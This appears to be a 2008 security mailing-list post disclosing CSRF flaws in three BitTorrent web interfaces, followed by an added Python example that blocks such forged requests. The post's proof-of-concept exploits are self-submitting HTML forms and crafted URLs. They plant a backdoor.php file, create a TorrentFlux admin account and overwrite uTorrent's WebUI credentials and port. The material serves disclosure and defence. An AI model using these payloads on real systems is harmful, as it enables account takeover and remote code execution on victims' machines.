Network Security Vuln-Dev

BitTorrent Clients and CSRF

Subject: BitTorrent Clients and CSRF
Date: 18 Apr 2008 08:33:51 -0000
The following are proof-of-concept exploits against three BitTorrent clients:
uTorrent's WebUI, Azureus's "HTML WebUI", and TorrentFlux.

More information:
http://www.rooksecurity.com/blog/?p=10

TorrentFlux v2.3 (Latest)
http://sourceforge.net/projects/torrentflux/

If you force TorrentFlux to download a torrent that contains a file 
backdoor.php you will be able to execute it by browsing here:
http://localhost/torrentflux_2.3/html/downloads/USER_NAME/
You do not have to know a password to access this folder, but you will have to 
know the username.
<html>
<form id='file_attack' method="post" 
action="http://localhost/torrentflux_2.3/html/index.php">
<input type=hidden name="url_upload" 
value="http://localhost/backdoor.php.torrent">
<input type=submit value='file attack'>
</form>
</html>
<script>
document.getElementById('file_attack').submit();
</script>

Add an administrative account:
<html>
<form id="create_admin" method="post" 
action="http://localhost/torrentflux_2.3/html/admin.php?op=addUser">
<input type=hidden name="newUser" value="sadmin">
<input type=hidden name="pass1" value="password">
<input type=hidden name="pass2" value="password">
<input type=hidden name="userType" value=1>
<input type=submit value="create admin">
</form>
</html>
<script>
document.getElementById("create_admin").submit();
</script>

uTorrent's WebUI is also affected:
http://forum.utorrent.com/viewtopic.php?id=14565
Force file download:
http://127.0.0.1:8080/gui/?action=add-url&s=http://localhost/backdoor.torrent

uTorrent change administrative login information:
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.username&v=badmin
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.password&v=badmin
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.port&v=4096
After the username or password has been changed, the browser must 
re-authenticate.
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.restrict&v=127.0.0.1/24,10.1.1.1

So is Azureus's HTML WebUI:
Force file download:
http://127.0.0.1:6886/index.tmpl?d=u&upurl=http://localhost/backdoor.torrent

  • BitTorrent Clients and CSRF, th3 . r00k . nospam <=
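
Added example, not part of the original post and not code from any of the projects it names: a server-side check, in Python, of the kind that refuses the forged requests shown above. It rejects state changes sent over GET, requires a same-origin Origin or Referer header, and requires a per-session token. The function names, the "token" parameter, the key, the session id and the host other-site.example are assumptions made for illustration.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}
# Action names taken from the uTorrent WebUI URLs quoted in the post.
STATE_CHANGING_ACTIONS = {"add-url", "setsetting"}


def issue_token(server_key: bytes, session_id: str) -> str:
    """Per-session anti-CSRF token that the UI embeds in its own forms."""
    return hmac.new(server_key, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(headers: dict, expected_origin: str) -> bool:
    """Compare Origin (or, failing that, Referer) with the UI's own origin."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # fail closed when the browser sent neither header
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == expected_origin


def check_request(method, headers, params, session_id, server_key, expected_origin):
    """Return (allowed, reason) for one request to the web UI."""
    safe = method.upper() in SAFE_METHODS
    if safe and params.get("action") not in STATE_CHANGING_ACTIONS:
        return True, "read-only"
    if safe:
        return False, "state change over a safe method"
    if not same_origin(headers, expected_origin):
        return False, "cross-origin or missing Origin/Referer"
    expected = issue_token(server_key, session_id)
    if not hmac.compare_digest(params.get("token", "").encode(), expected.encode()):
        return False, "missing or wrong CSRF token"
    return True, "ok"


# Constructed sample values; none of them come from the post.
KEY, SID, UI = b"constructed-demo-key", "session-1234", "http://127.0.0.1:8080"

if __name__ == "__main__":
    forged_get = check_request("GET", {"Referer": "http://other-site.example/"},
                               {"action": "setsetting"}, SID, KEY, UI)
    own_post = check_request("POST", {"Origin": UI},
                             {"action": "setsetting", "token": issue_token(KEY, SID)},
                             SID, KEY, UI)
    print(forged_get, own_post)
```

The token check matters even with the origin check in place, because some browsers and proxies omit Origin and Referer, and a deployment that relaxes the fail-closed rule for them still has the token to rely on.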